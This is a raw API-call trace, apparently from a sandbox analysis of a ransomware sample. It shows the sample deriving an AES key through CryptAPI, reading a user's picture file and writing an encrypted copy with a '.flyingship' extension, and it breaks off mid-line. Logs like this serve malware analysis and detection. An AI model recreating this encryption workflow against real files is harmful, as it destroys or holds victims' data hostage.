[0190.555] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0190.555] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0190.555] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0190.555] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0190.555] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0190.555] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="if", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0190.555] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gif", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0190.555] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".gif", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0190.555] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0190.555] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0190.555] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0190.556] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\QMJeO8.gif", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x324b5d80, ftCreationTime.dwHighDateTime=0x1d5e326, ftLastAccessTime.dwLowDateTime=0x4c7f4730, ftLastAccessTime.dwHighDateTime=0x1d5df38, ftLastWriteTime.dwLowDateTime=0x4c7f4730, ftLastWriteTime.dwHighDateTime=0x1d5df38, nFileSizeHigh=0x0, nFileSizeLow=0x8697, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="QMJeO8.gif", cAlternateFileName="")) returned 0x90add8 [0190.556] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0190.556] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0190.556] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\QMJeO8.gif", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x324b5d80, ftCreationTime.dwHighDateTime=0x1d5e326, ftLastAccessTime.dwLowDateTime=0x4c7f4730, ftLastAccessTime.dwHighDateTime=0x1d5df38, ftLastWriteTime.dwLowDateTime=0x4c7f4730, ftLastWriteTime.dwHighDateTime=0x1d5df38, nFileSizeHigh=0x0, nFileSizeLow=0x8697, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="QMJeO8.gif", cAlternateFileName="")) returned 0x90add8 [0190.556] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0190.556] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0190.556] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\QMJeO8.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.556] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\QMJeO8.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.556] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\QMJeO8.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.556] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\QMJeO8.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.556] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\QMJeO8.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.557] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\QMJeO8.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.557] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\QMJeO8.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.557] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\QMJeO8.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.557] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\QMJeO8.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.557] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\QMJeO8.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.557] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\QMJeO8.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.557] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\QMJeO8.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.557] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\QMJeO8.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.557] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\QMJeO8.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.557] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\QMJeO8.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.557] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\QMJeO8.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.557] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\QMJeO8.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.557] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\QMJeO8.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.557] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\QMJeO8.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.557] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\QMJeO8.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.557] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\QMJeO8.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.557] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\QMJeO8.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.557] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\QMJeO8.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.557] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\QMJeO8.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.557] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\QMJeO8.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.557] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\QMJeO8.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.557] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Pictures\\GX6xg0MP-Oop8LYh\\QMJeO8.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.557] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Pictures\\GX6xg0MP-Oop8LYh\\QMJeO8.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.557] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Pictures\\GX6xg0MP-Oop8LYh\\QMJeO8.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.557] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Pictures\\GX6xg0MP-Oop8LYh\\QMJeO8.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.557] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Pictures\\GX6xg0MP-Oop8LYh\\QMJeO8.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.557] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pictures\\GX6xg0MP-Oop8LYh\\QMJeO8.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.557] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ictures\\GX6xg0MP-Oop8LYh\\QMJeO8.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.558] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ctures\\GX6xg0MP-Oop8LYh\\QMJeO8.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.558] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tures\\GX6xg0MP-Oop8LYh\\QMJeO8.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.558] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ures\\GX6xg0MP-Oop8LYh\\QMJeO8.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.558] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="res\\GX6xg0MP-Oop8LYh\\QMJeO8.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.558] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="es\\GX6xg0MP-Oop8LYh\\QMJeO8.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.558] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\GX6xg0MP-Oop8LYh\\QMJeO8.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.558] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\GX6xg0MP-Oop8LYh\\QMJeO8.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.558] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GX6xg0MP-Oop8LYh\\QMJeO8.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.558] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="X6xg0MP-Oop8LYh\\QMJeO8.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.558] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6xg0MP-Oop8LYh\\QMJeO8.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.558] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xg0MP-Oop8LYh\\QMJeO8.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.558] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g0MP-Oop8LYh\\QMJeO8.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.558] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0MP-Oop8LYh\\QMJeO8.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.558] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MP-Oop8LYh\\QMJeO8.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.558] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="P-Oop8LYh\\QMJeO8.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.558] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-Oop8LYh\\QMJeO8.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.558] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Oop8LYh\\QMJeO8.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.558] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="op8LYh\\QMJeO8.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.558] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p8LYh\\QMJeO8.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.558] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8LYh\\QMJeO8.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.558] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LYh\\QMJeO8.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.558] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Yh\\QMJeO8.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.558] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="h\\QMJeO8.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.558] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\QMJeO8.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.558] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QMJeO8.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.558] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MJeO8.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.558] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0190.558] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0190.558] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0190.558] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0190.559] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0190.559] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="if", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0190.559] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gif", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0190.559] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".gif", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0190.559] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0190.559] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0190.559] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0190.559] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0190.559] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.559] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\QMJeO8.gif", lpFindFileData=0x87edb8 | out: lpFindFileData=0x87edb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x324b5d80, ftCreationTime.dwHighDateTime=0x1d5e326, ftLastAccessTime.dwLowDateTime=0x4c7f4730, ftLastAccessTime.dwHighDateTime=0x1d5df38, ftLastWriteTime.dwLowDateTime=0x4c7f4730, ftLastWriteTime.dwHighDateTime=0x1d5df38, nFileSizeHigh=0x0, nFileSizeLow=0x8697, dwReserved0=0x87ef08, dwReserved1=0x8a7560, cFileName="QMJeO8.gif", cAlternateFileName="")) returned 0x90ae18 [0190.559] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0190.559] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.559] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0190.559] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0190.578] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0190.578] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0190.578] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0190.578] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0190.579] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0190.579] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0190.579] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0190.579] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0190.579] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0190.579] CryptAcquireContextA (in: phProv=0x87ea98, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ea98*=0x9c0c88) returned 1 [0190.580] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0190.580] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0190.580] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0190.580] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0190.580] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0190.580] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0190.580] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0190.580] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0190.580] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0190.580] CryptCreateHash (in: hProv=0x9c0c88, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87e808 | out: phHash=0x87e808) returned 1 [0190.580] CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0190.580] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0190.581] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0190.581] CryptHashData (hHash=0x90af58, pbData=0x8df000, dwDataLen=0x19, dwFlags=0x1) returned 1 [0190.581] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0190.581] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0190.581] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0190.581] CryptDeriveKey (in: hProv=0x9c0c88, Algid=0x660e, hBaseData=0x90af58, dwFlags=0x1, phKey=0x87e808 | out: phKey=0x87e808*=0x90af98) returned 1 [0190.581] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0190.581] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0190.581] CryptDestroyHash (hHash=0x90af58) returned 1 [0190.581] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\QMJeO8.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gx6xg0mp-oop8lyh\\qmjeo8.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0190.582] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0190.583] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef40 | out: lpNewFilePointer=0x0) returned 1 [0190.583] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0190.583] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0190.583] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0190.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0190.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0190.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0190.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec68 | out: hHeap=0x8a0000) returned 1 [0190.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0190.584] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\QMJeO8.flyingship.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gx6xg0mp-oop8lyh\\qmjeo8.flyingship.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0190.584] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0c8 [0190.584] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0190.585] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0190.585] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0190.585] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0190.585] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0190.585] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec68 | out: hHeap=0x8a0000) returned 1 [0190.585] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0190.585] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef90 | out: lpNewFilePointer=0x0) returned 1 [0190.585] ReadFile (in: hFile=0x160, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x8697, lpOverlapped=0x0) returned 1 [0190.587] ReadFile (in: hFile=0x160, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x0, lpOverlapped=0x0) returned 1 [0190.587] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0190.587] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0190.587] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0190.587] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0190.587] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8697) returned 0xbea018 [0190.587] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x2480020 | out: hHeap=0x8a0000) returned 1 [0190.588] HeapFree (in: 